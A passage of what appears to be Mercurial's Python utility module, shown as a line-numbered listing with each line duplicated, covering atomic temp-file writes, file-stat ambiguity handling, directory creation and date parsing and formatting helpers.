1690 treated as ambiguous regardless of mtime, to avoid overlooking
1691 by confliction between such mtime.
1691 by confliction between such mtime.
1692
1692
1693 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1693 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1694 S[n].mtime", even if size of a file isn't changed.
1694 S[n].mtime", even if size of a file isn't changed.
1695 """
1695 """
1696 try:
1696 try:
1697 return (self.stat.st_ctime == old.stat.st_ctime)
1697 return (self.stat.st_ctime == old.stat.st_ctime)
1698 except AttributeError:
1698 except AttributeError:
1699 return False
1699 return False
1700
1700
1701 def avoidambig(self, path, old):
1701 def avoidambig(self, path, old):
1702 """Change file stat of specified path to avoid ambiguity
1702 """Change file stat of specified path to avoid ambiguity
1703
1703
1704 'old' should be previous filestat of 'path'.
1704 'old' should be previous filestat of 'path'.
1705
1705
1706 This skips avoiding ambiguity, if a process doesn't have
1706 This skips avoiding ambiguity, if a process doesn't have
1707 appropriate privileges for 'path'. This returns False in this
1707 appropriate privileges for 'path'. This returns False in this
1708 case.
1708 case.
1709
1709
1710 Otherwise, this returns True, as "ambiguity is avoided".
1710 Otherwise, this returns True, as "ambiguity is avoided".
1711 """
1711 """
1712 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1712 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1713 try:
1713 try:
1714 os.utime(path, (advanced, advanced))
1714 os.utime(path, (advanced, advanced))
1715 except OSError as inst:
1715 except OSError as inst:
1716 if inst.errno == errno.EPERM:
1716 if inst.errno == errno.EPERM:
1717 # utime() on the file created by another user causes EPERM,
1717 # utime() on the file created by another user causes EPERM,
1718 # if a process doesn't have appropriate privileges
1718 # if a process doesn't have appropriate privileges
1719 return False
1719 return False
1720 raise
1720 raise
1721 return True
1721 return True
1722
1722
1723 def __ne__(self, other):
1723 def __ne__(self, other):
1724 return not self == other
1724 return not self == other
1725
1725
1726 class atomictempfile(object):
1726 class atomictempfile(object):
1727 '''writable file object that atomically updates a file
1727 '''writable file object that atomically updates a file
1728
1728
1729 All writes will go to a temporary copy of the original file. Call
1729 All writes will go to a temporary copy of the original file. Call
1730 close() when you are done writing, and atomictempfile will rename
1730 close() when you are done writing, and atomictempfile will rename
1731 the temporary copy to the original name, making the changes
1731 the temporary copy to the original name, making the changes
1732 visible. If the object is destroyed without being closed, all your
1732 visible. If the object is destroyed without being closed, all your
1733 writes are discarded.
1733 writes are discarded.
1734
1734
1735 checkambig argument of constructor is used with filestat, and is
1735 checkambig argument of constructor is used with filestat, and is
1736 useful only if target file is guarded by any lock (e.g. repo.lock
1736 useful only if target file is guarded by any lock (e.g. repo.lock
1737 or repo.wlock).
1737 or repo.wlock).
1738 '''
1738 '''
1739 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1739 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1740 self.__name = name # permanent name
1740 self.__name = name # permanent name
1741 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1741 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1742 createmode=createmode)
1742 createmode=createmode)
1743 self._fp = posixfile(self._tempname, mode)
1743 self._fp = posixfile(self._tempname, mode)
1744 self._checkambig = checkambig
1744 self._checkambig = checkambig
1745
1745
1746 # delegated methods
1746 # delegated methods
1747 self.read = self._fp.read
1747 self.read = self._fp.read
1748 self.write = self._fp.write
1748 self.write = self._fp.write
1749 self.seek = self._fp.seek
1749 self.seek = self._fp.seek
1750 self.tell = self._fp.tell
1750 self.tell = self._fp.tell
1751 self.fileno = self._fp.fileno
1751 self.fileno = self._fp.fileno
1752
1752
1753 def close(self):
1753 def close(self):
1754 if not self._fp.closed:
1754 if not self._fp.closed:
1755 self._fp.close()
1755 self._fp.close()
1756 filename = localpath(self.__name)
1756 filename = localpath(self.__name)
1757 oldstat = self._checkambig and filestat.frompath(filename)
1757 oldstat = self._checkambig and filestat.frompath(filename)
1758 if oldstat and oldstat.stat:
1758 if oldstat and oldstat.stat:
1759 rename(self._tempname, filename)
1759 rename(self._tempname, filename)
1760 newstat = filestat.frompath(filename)
1760 newstat = filestat.frompath(filename)
1761 if newstat.isambig(oldstat):
1761 if newstat.isambig(oldstat):
1762 # stat of changed file is ambiguous to original one
1762 # stat of changed file is ambiguous to original one
1763 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1763 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1764 os.utime(filename, (advanced, advanced))
1764 os.utime(filename, (advanced, advanced))
1765 else:
1765 else:
1766 rename(self._tempname, filename)
1766 rename(self._tempname, filename)
1767
1767
1768 def discard(self):
1768 def discard(self):
1769 if not self._fp.closed:
1769 if not self._fp.closed:
1770 try:
1770 try:
1771 os.unlink(self._tempname)
1771 os.unlink(self._tempname)
1772 except OSError:
1772 except OSError:
1773 pass
1773 pass
1774 self._fp.close()
1774 self._fp.close()
1775
1775
1776 def __del__(self):
1776 def __del__(self):
1777 if safehasattr(self, '_fp'): # constructor actually did something
1777 if safehasattr(self, '_fp'): # constructor actually did something
1778 self.discard()
1778 self.discard()
1779
1779
1780 def __enter__(self):
1780 def __enter__(self):
1781 return self
1781 return self
1782
1782
1783 def __exit__(self, exctype, excvalue, traceback):
1783 def __exit__(self, exctype, excvalue, traceback):
1784 if exctype is not None:
1784 if exctype is not None:
1785 self.discard()
1785 self.discard()
1786 else:
1786 else:
1787 self.close()
1787 self.close()
1788
1788
1789 def unlinkpath(f, ignoremissing=False):
1789 def unlinkpath(f, ignoremissing=False):
1790 """unlink and remove the directory if it is empty"""
1790 """unlink and remove the directory if it is empty"""
1791 if ignoremissing:
1791 if ignoremissing:
1792 tryunlink(f)
1792 tryunlink(f)
1793 else:
1793 else:
1794 unlink(f)
1794 unlink(f)
1795 # try removing directories that might now be empty
1795 # try removing directories that might now be empty
1796 try:
1796 try:
1797 removedirs(os.path.dirname(f))
1797 removedirs(os.path.dirname(f))
1798 except OSError:
1798 except OSError:
1799 pass
1799 pass
1800
1800
1801 def tryunlink(f):
1801 def tryunlink(f):
1802 """Attempt to remove a file, ignoring ENOENT errors."""
1802 """Attempt to remove a file, ignoring ENOENT errors."""
1803 try:
1803 try:
1804 unlink(f)
1804 unlink(f)
1805 except OSError as e:
1805 except OSError as e:
1806 if e.errno != errno.ENOENT:
1806 if e.errno != errno.ENOENT:
1807 raise
1807 raise
1808
1808
1809 def makedirs(name, mode=None, notindexed=False):
1809 def makedirs(name, mode=None, notindexed=False):
1810 """recursive directory creation with parent mode inheritance
1810 """recursive directory creation with parent mode inheritance
1811
1811
1812 Newly created directories are marked as "not to be indexed by
1812 Newly created directories are marked as "not to be indexed by
1813 the content indexing service", if ``notindexed`` is specified
1813 the content indexing service", if ``notindexed`` is specified
1814 for "write" mode access.
1814 for "write" mode access.
1815 """
1815 """
1816 try:
1816 try:
1817 makedir(name, notindexed)
1817 makedir(name, notindexed)
1818 except OSError as err:
1818 except OSError as err:
1819 if err.errno == errno.EEXIST:
1819 if err.errno == errno.EEXIST:
1820 return
1820 return
1821 if err.errno != errno.ENOENT or not name:
1821 if err.errno != errno.ENOENT or not name:
1822 raise
1822 raise
1823 parent = os.path.dirname(os.path.abspath(name))
1823 parent = os.path.dirname(os.path.abspath(name))
1824 if parent == name:
1824 if parent == name:
1825 raise
1825 raise
1826 makedirs(parent, mode, notindexed)
1826 makedirs(parent, mode, notindexed)
1827 try:
1827 try:
1828 makedir(name, notindexed)
1828 makedir(name, notindexed)
1829 except OSError as err:
1829 except OSError as err:
1830 # Catch EEXIST to handle races
1830 # Catch EEXIST to handle races
1831 if err.errno == errno.EEXIST:
1831 if err.errno == errno.EEXIST:
1832 return
1832 return
1833 raise
1833 raise
1834 if mode is not None:
1834 if mode is not None:
1835 os.chmod(name, mode)
1835 os.chmod(name, mode)
1836
1836
1837 def readfile(path):
1837 def readfile(path):
1838 with open(path, 'rb') as fp:
1838 with open(path, 'rb') as fp:
1839 return fp.read()
1839 return fp.read()
1840
1840
1841 def writefile(path, text):
1841 def writefile(path, text):
1842 with open(path, 'wb') as fp:
1842 with open(path, 'wb') as fp:
1843 fp.write(text)
1843 fp.write(text)
1844
1844
1845 def appendfile(path, text):
1845 def appendfile(path, text):
1846 with open(path, 'ab') as fp:
1846 with open(path, 'ab') as fp:
1847 fp.write(text)
1847 fp.write(text)
1848
1848
1849 class chunkbuffer(object):
1849 class chunkbuffer(object):
1850 """Allow arbitrary sized chunks of data to be efficiently read from an
1850 """Allow arbitrary sized chunks of data to be efficiently read from an
1851 iterator over chunks of arbitrary size."""
1851 iterator over chunks of arbitrary size."""
1852
1852
1853 def __init__(self, in_iter):
1853 def __init__(self, in_iter):
1854 """in_iter is the iterator that's iterating over the input chunks."""
1854 """in_iter is the iterator that's iterating over the input chunks."""
1855 def splitbig(chunks):
1855 def splitbig(chunks):
1856 for chunk in chunks:
1856 for chunk in chunks:
1857 if len(chunk) > 2**20:
1857 if len(chunk) > 2**20:
1858 pos = 0
1858 pos = 0
1859 while pos < len(chunk):
1859 while pos < len(chunk):
1860 end = pos + 2 ** 18
1860 end = pos + 2 ** 18
1861 yield chunk[pos:end]
1861 yield chunk[pos:end]
1862 pos = end
1862 pos = end
1863 else:
1863 else:
1864 yield chunk
1864 yield chunk
1865 self.iter = splitbig(in_iter)
1865 self.iter = splitbig(in_iter)
1866 self._queue = collections.deque()
1866 self._queue = collections.deque()
1867 self._chunkoffset = 0
1867 self._chunkoffset = 0
1868
1868
1869 def read(self, l=None):
1869 def read(self, l=None):
1870 """Read L bytes of data from the iterator of chunks of data.
1870 """Read L bytes of data from the iterator of chunks of data.
1871 Returns less than L bytes if the iterator runs dry.
1871 Returns less than L bytes if the iterator runs dry.
1872
1872
1873 If size parameter is omitted, read everything"""
1873 If size parameter is omitted, read everything"""
1874 if l is None:
1874 if l is None:
1875 return ''.join(self.iter)
1875 return ''.join(self.iter)
1876
1876
1877 left = l
1877 left = l
1878 buf = []
1878 buf = []
1879 queue = self._queue
1879 queue = self._queue
1880 while left > 0:
1880 while left > 0:
1881 # refill the queue
1881 # refill the queue
1882 if not queue:
1882 if not queue:
1883 target = 2**18
1883 target = 2**18
1884 for chunk in self.iter:
1884 for chunk in self.iter:
1885 queue.append(chunk)
1885 queue.append(chunk)
1886 target -= len(chunk)
1886 target -= len(chunk)
1887 if target <= 0:
1887 if target <= 0:
1888 break
1888 break
1889 if not queue:
1889 if not queue:
1890 break
1890 break
1891
1891
1892 # The easy way to do this would be to queue.popleft(), modify the
1892 # The easy way to do this would be to queue.popleft(), modify the
1893 # chunk (if necessary), then queue.appendleft(). However, for cases
1893 # chunk (if necessary), then queue.appendleft(). However, for cases
1894 # where we read partial chunk content, this incurs 2 dequeue
1894 # where we read partial chunk content, this incurs 2 dequeue
1895 # mutations and creates a new str for the remaining chunk in the
1895 # mutations and creates a new str for the remaining chunk in the
1896 # queue. Our code below avoids this overhead.
1896 # queue. Our code below avoids this overhead.
1897
1897
1898 chunk = queue[0]
1898 chunk = queue[0]
1899 chunkl = len(chunk)
1899 chunkl = len(chunk)
1900 offset = self._chunkoffset
1900 offset = self._chunkoffset
1901
1901
1902 # Use full chunk.
1902 # Use full chunk.
1903 if offset == 0 and left >= chunkl:
1903 if offset == 0 and left >= chunkl:
1904 left -= chunkl
1904 left -= chunkl
1905 queue.popleft()
1905 queue.popleft()
1906 buf.append(chunk)
1906 buf.append(chunk)
1907 # self._chunkoffset remains at 0.
1907 # self._chunkoffset remains at 0.
1908 continue
1908 continue
1909
1909
1910 chunkremaining = chunkl - offset
1910 chunkremaining = chunkl - offset
1911
1911
1912 # Use all of unconsumed part of chunk.
1912 # Use all of unconsumed part of chunk.
1913 if left >= chunkremaining:
1913 if left >= chunkremaining:
1914 left -= chunkremaining
1914 left -= chunkremaining
1915 queue.popleft()
1915 queue.popleft()
1916 # offset == 0 is enabled by block above, so this won't merely
1916 # offset == 0 is enabled by block above, so this won't merely
1917 # copy via ``chunk[0:]``.
1917 # copy via ``chunk[0:]``.
1918 buf.append(chunk[offset:])
1918 buf.append(chunk[offset:])
1919 self._chunkoffset = 0
1919 self._chunkoffset = 0
1920
1920
1921 # Partial chunk needed.
1921 # Partial chunk needed.
1922 else:
1922 else:
1923 buf.append(chunk[offset:offset + left])
1923 buf.append(chunk[offset:offset + left])
1924 self._chunkoffset += left
1924 self._chunkoffset += left
1925 left -= chunkremaining
1925 left -= chunkremaining
1926
1926
1927 return ''.join(buf)
1927 return ''.join(buf)
1928
1928
1929 def filechunkiter(f, size=131072, limit=None):
1929 def filechunkiter(f, size=131072, limit=None):
1930 """Create a generator that produces the data in the file size
1930 """Create a generator that produces the data in the file size
1931 (default 131072) bytes at a time, up to optional limit (default is
1931 (default 131072) bytes at a time, up to optional limit (default is
1932 to read all data). Chunks may be less than size bytes if the
1932 to read all data). Chunks may be less than size bytes if the
1933 chunk is the last chunk in the file, or the file is a socket or
1933 chunk is the last chunk in the file, or the file is a socket or
1934 some other type of file that sometimes reads less data than is
1934 some other type of file that sometimes reads less data than is
1935 requested."""
1935 requested."""
1936 assert size >= 0
1936 assert size >= 0
1937 assert limit is None or limit >= 0
1937 assert limit is None or limit >= 0
1938 while True:
1938 while True:
1939 if limit is None:
1939 if limit is None:
1940 nbytes = size
1940 nbytes = size
1941 else:
1941 else:
1942 nbytes = min(limit, size)
1942 nbytes = min(limit, size)
1943 s = nbytes and f.read(nbytes)
1943 s = nbytes and f.read(nbytes)
1944 if not s:
1944 if not s:
1945 break
1945 break
1946 if limit:
1946 if limit:
1947 limit -= len(s)
1947 limit -= len(s)
1948 yield s
1948 yield s
1949
1949
1950 def makedate(timestamp=None):
1950 def makedate(timestamp=None):
1951 '''Return a unix timestamp (or the current time) as a (unixtime,
1951 '''Return a unix timestamp (or the current time) as a (unixtime,
1952 offset) tuple based off the local timezone.'''
1952 offset) tuple based off the local timezone.'''
1953 if timestamp is None:
1953 if timestamp is None:
1954 timestamp = time.time()
1954 timestamp = time.time()
1955 if timestamp < 0:
1955 if timestamp < 0:
1956 hint = _("check your clock")
1956 hint = _("check your clock")
1957 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1957 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1958 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1958 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1959 datetime.datetime.fromtimestamp(timestamp))
1959 datetime.datetime.fromtimestamp(timestamp))
1960 tz = delta.days * 86400 + delta.seconds
1960 tz = delta.days * 86400 + delta.seconds
1961 return timestamp, tz
1961 return timestamp, tz
1962
1962
1963 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1963 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1964 """represent a (unixtime, offset) tuple as a localized time.
1964 """represent a (unixtime, offset) tuple as a localized time.
1965 unixtime is seconds since the epoch, and offset is the time zone's
1965 unixtime is seconds since the epoch, and offset is the time zone's
1966 number of seconds away from UTC.
1966 number of seconds away from UTC.
1967
1967
1968 >>> datestr((0, 0))
1968 >>> datestr((0, 0))
1969 'Thu Jan 01 00:00:00 1970 +0000'
1969 'Thu Jan 01 00:00:00 1970 +0000'
1970 >>> datestr((42, 0))
1970 >>> datestr((42, 0))
1971 'Thu Jan 01 00:00:42 1970 +0000'
1971 'Thu Jan 01 00:00:42 1970 +0000'
1972 >>> datestr((-42, 0))
1972 >>> datestr((-42, 0))
1973 'Wed Dec 31 23:59:18 1969 +0000'
1973 'Wed Dec 31 23:59:18 1969 +0000'
1974 >>> datestr((0x7fffffff, 0))
1974 >>> datestr((0x7fffffff, 0))
1975 'Tue Jan 19 03:14:07 2038 +0000'
1975 'Tue Jan 19 03:14:07 2038 +0000'
1976 >>> datestr((-0x80000000, 0))
1976 >>> datestr((-0x80000000, 0))
1977 'Fri Dec 13 20:45:52 1901 +0000'
1977 'Fri Dec 13 20:45:52 1901 +0000'
1978 """
1978 """
1979 t, tz = date or makedate()
1979 t, tz = date or makedate()
1980 if "%1" in format or "%2" in format or "%z" in format:
1980 if "%1" in format or "%2" in format or "%z" in format:
1981 sign = (tz > 0) and "-" or "+"
1981 sign = (tz > 0) and "-" or "+"
1982 minutes = abs(tz) // 60
1982 minutes = abs(tz) // 60
1983 q, r = divmod(minutes, 60)
1983 q, r = divmod(minutes, 60)
1984 format = format.replace("%z", "%1%2")
1984 format = format.replace("%z", "%1%2")
1985 format = format.replace("%1", "%c%02d" % (sign, q))
1985 format = format.replace("%1", "%c%02d" % (sign, q))
1986 format = format.replace("%2", "%02d" % r)
1986 format = format.replace("%2", "%02d" % r)
1987 d = t - tz
1987 d = t - tz
1988 if d > 0x7fffffff:
1988 if d > 0x7fffffff:
1989 d = 0x7fffffff
1989 d = 0x7fffffff
1990 elif d < -0x80000000:
1990 elif d < -0x80000000:
1991 d = -0x80000000
1991 d = -0x80000000
1992 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1992 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1993 # because they use the gmtime() system call which is buggy on Windows
1993 # because they use the gmtime() system call which is buggy on Windows
1994 # for negative values.
1994 # for negative values.
1995 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1995 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1996 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1996 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1997 return s
1997 return s
1998
1998
1999 def shortdate(date=None):
1999 def shortdate(date=None):
2000 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2000 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2001 return datestr(date, format='%Y-%m-%d')
2001 return datestr(date, format='%Y-%m-%d')
2002
2002
2003 def parsetimezone(s):
2003 def parsetimezone(s):
2004 """find a trailing timezone, if any, in string, and return a
2004 """find a trailing timezone, if any, in string, and return a
2005 (offset, remainder) pair"""
2005 (offset, remainder) pair"""
2006
2006
2007 if s.endswith("GMT") or s.endswith("UTC"):
2007 if s.endswith("GMT") or s.endswith("UTC"):
2008 return 0, s[:-3].rstrip()
2008 return 0, s[:-3].rstrip()
2009
2009
2010 # Unix-style timezones [+-]hhmm
2010 # Unix-style timezones [+-]hhmm
2011 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2011 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2012 sign = (s[-5] == "+") and 1 or -1
2012 sign = (s[-5] == "+") and 1 or -1
2013 hours = int(s[-4:-2])
2013 hours = int(s[-4:-2])
2014 minutes = int(s[-2:])
2014 minutes = int(s[-2:])
2015 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2015 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2016
2016
2017 # ISO8601 trailing Z
2017 # ISO8601 trailing Z
2018 if s.endswith("Z") and s[-2:-1].isdigit():
2018 if s.endswith("Z") and s[-2:-1].isdigit():
2019 return 0, s[:-1]
2019 return 0, s[:-1]
2020
2020
2021 # ISO8601-style [+-]hh:mm
2021 # ISO8601-style [+-]hh:mm
2022 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2022 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2023 s[-5:-3].isdigit() and s[-2:].isdigit()):
2023 s[-5:-3].isdigit() and s[-2:].isdigit()):
2024 sign = (s[-6] == "+") and 1 or -1
2024 sign = (s[-6] == "+") and 1 or -1
2025 hours = int(s[-5:-3])
2025 hours = int(s[-5:-3])
2026 minutes = int(s[-2:])
2026 minutes = int(s[-2:])
2027 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2027 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2028
2028
2029 return None, s
2029 return None, s
2030
2030
2031 def strdate(string, format, defaults=None):
2031 def strdate(string, format, defaults=None):
2032 """parse a localized time string and return a (unixtime, offset) tuple.
2032 """parse a localized time string and return a (unixtime, offset) tuple.
2033 if the string cannot be parsed, ValueError is raised."""
2033 if the string cannot be parsed, ValueError is raised."""
2034 if defaults is None:
2034 if defaults is None:
2035 defaults = {}
2035 defaults = {}
2036
2036
2037 # NOTE: unixtime = localunixtime + offset
2037 # NOTE: unixtime = localunixtime + offset
2038 offset, date = parsetimezone(string)
2038 offset, date = parsetimezone(string)
2039
2039
2040 # add missing elements from defaults
2040 # add missing elements from defaults
2041 usenow = False # default to using biased defaults
2041 usenow = False # default to using biased defaults
2042 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2042 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2043 part = pycompat.bytestr(part)
2043 part = pycompat.bytestr(part)
2044 found = [True for p in part if ("%"+p) in format]
2044 found = [True for p in part if ("%"+p) in format]
2045 if not found:
2045 if not found:
2046 date += "@" + defaults[part][usenow]
2046 date += "@" + defaults[part][usenow]
2047 format += "@%" + part[0]
2047 format += "@%" + part[0]
2048 else:
2048 else:
2049 # We've found a specific time element, less specific time
2049 # We've found a specific time element, less specific time
2050 # elements are relative to today
2050 # elements are relative to today
2051 usenow = True
2051 usenow = True
2052
2052
2053 timetuple = time.strptime(encoding.strfromlocal(date),
2053 timetuple = time.strptime(encoding.strfromlocal(date),
2054 encoding.strfromlocal(format))
2054 encoding.strfromlocal(format))
2055 localunixtime = int(calendar.timegm(timetuple))
2055 localunixtime = int(calendar.timegm(timetuple))
2056 if offset is None:
2056 if offset is None:
2057 # local timezone
2057 # local timezone
2058 unixtime = int(time.mktime(timetuple))
2058 unixtime = int(time.mktime(timetuple))
2059 offset = unixtime - localunixtime
2059 offset = unixtime - localunixtime
2060 else:
2060 else:
2061 unixtime = localunixtime + offset
2061 unixtime = localunixtime + offset
2062 return unixtime, offset
2062 return unixtime, offset
2063
2063
2064 def parsedate(date, formats=None, bias=None):
2064 def parsedate(date, formats=None, bias=None):
2065 """parse a localized date/time and return a (unixtime, offset) tuple.
2065 """parse a localized date/time and return a (unixtime, offset) tuple.
2066
2066
2067 The date may be a "unixtime offset" string or in one of the specified
2067 The date may be a "unixtime offset" string or in one of the specified
2068 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2068 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2069
2069
2070 >>> parsedate(b' today ') == parsedate(
2070 >>> parsedate(b' today ') == parsedate(
2071 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2071 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2072 True
2072 True
2073 >>> parsedate(b'yesterday ') == parsedate(
2073 >>> parsedate(b'yesterday ') == parsedate(
2074 ... (datetime.date.today() - datetime.timedelta(days=1)
2074 ... (datetime.date.today() - datetime.timedelta(days=1)
2075 ... ).strftime('%b %d').encode('ascii'))
2075 ... ).strftime('%b %d').encode('ascii'))
2076 True
2076 True
2077 >>> now, tz = makedate()
2077 >>> now, tz = makedate()
2078 >>> strnow, strtz = parsedate(b'now')
2078 >>> strnow, strtz = parsedate(b'now')
2079 >>> (strnow - now) < 1
2079 >>> (strnow - now) < 1
2080 True
2080 True
2081 >>> tz == strtz
2081 >>> tz == strtz
2082 True
2082 True
2083 """
2083 """
2084 if bias is None:
2084 if bias is None:
2085 bias = {}
2085 bias = {}
2086 if not date:
2086 if not date:
2087 return 0, 0
2087 return 0, 0
2088 if isinstance(date, tuple) and len(date) == 2:
2088 if isinstance(date, tuple) and len(date) == 2:
2089 return date
2089 return date
2090 if not formats:
2090 if not formats:
2091 formats = defaultdateformats
2091 formats = defaultdateformats
2092 date = date.strip()
2092 date = date.strip()
2093
2093
2094 if date == 'now' or date == _('now'):
2094 if date == 'now' or date == _('now'):
2095 return makedate()
2095 return makedate()
2096 if date == 'today' or date == _('today'):
2096 if date == 'today' or date == _('today'):
2097 date = datetime.date.today().strftime(r'%b %d')
2097 date = datetime.date.today().strftime(r'%b %d')
2098 date = encoding.strtolocal(date)
2098 date = encoding.strtolocal(date)
2099 elif date == 'yesterday' or date == _('yesterday'):
2099 elif date == 'yesterday' or date == _('yesterday'):
2100 date = (datetime.date.today() -
2100 date = (datetime.date.today() -
2101 datetime.timedelta(days=1)).strftime(r'%b %d')
2101 datetime.timedelta(days=1)).strftime(r'%b %d')
2102 date = encoding.strtolocal(date)
2102 date = encoding.strtolocal(date)
2103
2103
2104 try:
2104 try:
2105 when, offset = map(int, date.split(' '))
2105 when, offset = map(int, date.split(' '))
2106 except ValueError:
2106 except ValueError:
2107 # fill out defaults
2107 # fill out defaults
2108 now = makedate()
2108 now = makedate()
2109 defaults = {}
2109 defaults = {}
2110 for part in ("d", "mb", "yY", "HI", "M", "S"):
2110 for part in ("d", "mb", "yY", "HI", "M", "S"):
2111 # this piece is for rounding the specific end of unknowns
2111 # this piece is for rounding the specific end of unknowns
2112 b = bias.get(part)
2112 b = bias.get(part)
2113 if b is None:
2113 if b is None:
2114 if part[0:1] in "HMS":
2114 if part[0:1] in "HMS":
2115 b = "00"
2115 b = "00"
2116 else:
2116 else:
2117 b = "0"
2117 b = "0"
2118
2118
2119 # this piece is for matching the generic end to today's date
2119 # this piece is for matching the generic end to today's date
2120 n = datestr(now, "%" + part[0:1])
2120 n = datestr(now, "%" + part[0:1])
2121
2121
2122 defaults[part] = (b, n)
2122 defaults[part] = (b, n)
2123
2123
2124 for format in formats:
2124 for format in formats:
2125 try:
2125 try:
2126 when, offset = strdate(date, format, defaults)
2126 when, offset = strdate(date, format, defaults)
2127 except (ValueError, OverflowError):
2127 except (ValueError, OverflowError):
2128 pass
2128 pass
2129 else:
2129 else:
2130 break
2130 break
2131 else:
2131 else:
2132 raise error.ParseError(_('invalid date: %r') % date)
2132 raise error.ParseError(_('invalid date: %r') % date)
2133 # validate explicit (probably user-specified) date and
2133 # validate explicit (probably user-specified) date and
2134 # time zone offset. values must fit in signed 32 bits for
2134 # time zone offset. values must fit in signed 32 bits for
2135 # current 32-bit linux runtimes. timezones go from UTC-12
2135 # current 32-bit linux runtimes. timezones go from UTC-12
2136 # to UTC+14
2136 # to UTC+14
2137 if when < -0x80000000 or when > 0x7fffffff:
2137 if when < -0x80000000 or when > 0x7fffffff:
2138 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2138 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2139 if offset < -50400 or offset > 43200:
2139 if offset < -50400 or offset > 43200:
2140 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2140 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2141 return when, offset
2141 return when, offset
2142
2142
2143 def matchdate(date):
2143 def matchdate(date):
2144 """Return a function that matches a given date match specifier
2144 """Return a function that matches a given date match specifier
2145
2145
2146 Formats include:
2146 Formats include:
2147
2147
2148 '{date}' match a given date to the accuracy provided
2148 '{date}' match a given date to the accuracy provided
2149
2149
2150 '<{date}' on or before a given date
2150 '<{date}' on or before a given date
2151
2151
2152 '>{date}' on or after a given date
2152 '>{date}' on or after a given date
2153
2153
2154 >>> p1 = parsedate(b"10:29:59")
2154 >>> p1 = parsedate(b"10:29:59")
2155 >>> p2 = parsedate(b"10:30:00")
2155 >>> p2 = parsedate(b"10:30:00")
2156 >>> p3 = parsedate(b"10:30:59")
2156 >>> p3 = parsedate(b"10:30:59")
2157 >>> p4 = parsedate(b"10:31:00")
2157 >>> p4 = parsedate(b"10:31:00")
2158 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2158 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2159 >>> f = matchdate(b"10:30")
2159 >>> f = matchdate(b"10:30")
2160 >>> f(p1[0])
2160 >>> f(p1[0])
2161 False
2161 False
2162 >>> f(p2[0])
2162 >>> f(p2[0])
2163 True
2163 True
2164 >>> f(p3[0])
2164 >>> f(p3[0])
2165 True
2165 True
2166 >>> f(p4[0])
2166 >>> f(p4[0])
2167 False
2167 False
2168 >>> f(p5[0])
2168 >>> f(p5[0])
2169 False
2169 False
2170 """
2170 """
2171
2171
2172 def lower(date):
2172 def lower(date):
2173 d = {'mb': "1", 'd': "1"}
2173 d = {'mb': "1", 'd': "1"}
2174 return parsedate(date, extendeddateformats, d)[0]
2174 return parsedate(date, extendeddateformats, d)[0]
2175
2175
2176 def upper(date):
2176 def upper(date):
2177 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2177 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2178 for days in ("31", "30", "29"):
2178 for days in ("31", "30", "29"):
2179 try:
2179 try:
2180 d["d"] = days
2180 d["d"] = days
2181 return parsedate(date, extendeddateformats, d)[0]
2181 return parsedate(date, extendeddateformats, d)[0]
2182 except Abort:
2182 except Abort:
2183 pass
2183 pass
2184 d["d"] = "28"
2184 d["d"] = "28"
2185 return parsedate(date, extendeddateformats, d)[0]
2185 return parsedate(date, extendeddateformats, d)[0]
2186
2186
2187 date = date.strip()
2187 date = date.strip()
2188
2188
2189 if not date:
2189 if not date:
2190 raise Abort(_("dates cannot consist entirely of whitespace"))
2190 raise Abort(_("dates cannot consist entirely of whitespace"))
2191 elif date[0] == "<":
2191 elif date[0] == "<":
2192 if not date[1:]:
2192 if not date[1:]:
2193 raise Abort(_("invalid day spec, use '<DATE'"))
2193 raise Abort(_("invalid day spec, use '<DATE'"))
2194 when = upper(date[1:])
2194 when = upper(date[1:])
2195 return lambda x: x <= when
2195 return lambda x: x <= when
2196 elif date[0] == ">":
2196 elif date[0] == ">":
2197 if not date[1:]:
2197 if not date[1:]:
2198 raise Abort(_("invalid day spec, use '>DATE'"))
2198 raise Abort(_("invalid day spec, use '>DATE'"))
2199 when = lower(date[1:])
2199 when = lower(date[1:])
2200 return lambda x: x >= when
2200 return lambda x: x >= when
2201 elif date[0] == "-":
2201 elif date[0] == "-":
2202 try:
